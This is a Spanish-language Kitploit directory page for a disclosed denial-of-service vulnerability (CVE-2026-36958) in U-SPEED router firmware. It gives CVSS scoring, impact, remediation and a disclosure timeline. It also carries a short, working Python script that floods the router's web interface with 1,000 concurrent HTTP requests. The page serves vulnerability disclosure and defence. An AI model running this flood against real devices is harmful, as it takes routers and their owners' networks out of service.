Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-36958 — Prueba de concepto para CVE-2026-36958, una vulnerabilidad de denegación de servicio en el firmware del router U-SPEED que agota los recursos mediante solicitudes HTTP concurrentes, provocando que la interfaz web deje de responder. | Kitploit
Herramientas/GitHubGitHub/kirubel-cve/cve-2026-36958
Análisis de VulnerabilidadesExplotaciónSeguridad WebSeguridad de RedesPruebas de Penetración
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

Prueba de concepto para CVE-2026-36958, una vulnerabilidad de denegación de servicio en el firmware del router U-SPEED que agota los recursos mediante solicitudes HTTP concurrentes, provocando que la interfaz web deje de responder.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-36958: Denegación de Servicio mediante Solicitudes HTTP Concurrentes

ID CVE: CVE-2026-36958 Fecha: 2026-04-29 Descubridor: Kirubel Solomne Proveedor: U-SPEED Producto: Router U-SPEED Versión de Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos No Controlado


Descripción

El firmware V1.0.0 del Router U-SPEED es vulnerable a la Denegación de Servicio. Al enviar un gran número de solicitudes HTTP concurrentes a endpoints aleatorios o inexistentes en la interfaz de administración web, un atacante puede agotar los recursos del sistema en el servidor HTTP Boa integrado. Esto provoca que la interfaz web del router deje de responder y puede requerir un reinicio manual para restaurar el funcionamiento normal.


Puntuación CVSS

Puntuación CVSS v3.1: 7.5 (Alta) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MétricaValor
Vector de AtaqueRed
Complejidad de AtaqueBaja
Privilegios RequeridosNinguno
Interacción del UsuarioNinguna
Impacto de ConfidencialidadNinguno
Impacto de IntegridadNinguno
Impacto de DisponibilidadAlto

Prueba de Concepto

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

Comportamiento Esperado: El servidor debería gestionar las conexiones concurrentes de forma adecuada. Comportamiento Real: La interfaz web deja de responder; se requiere un reinicio manual.


Impacto

  • La interfaz de administración web queda no disponible
  • Posible interrupción de los servicios de enrutamiento
  • Se requiere un reinicio manual para restaurar la funcionalidad

Remediación

  • Implementar limitación de velocidad de conexiones en el servidor web Boa
  • Limitar el número máximo de conexiones concurrentes por IP de origen
  • Añadir un mecanismo automático de recuperación/perro guardián

Cronología de Divulgación

FechaEvento
2026-04-29Vulnerabilidad descubierta
2026-04-29Reportada a MITRE
2026-04-29CVE-2026-36958 asignado
2026-04-29Divulgación pública

Referencias

  • MITRE CVE-2026-36958
  • CWE-400
  • Sitio web del proveedor
Descargar herramienta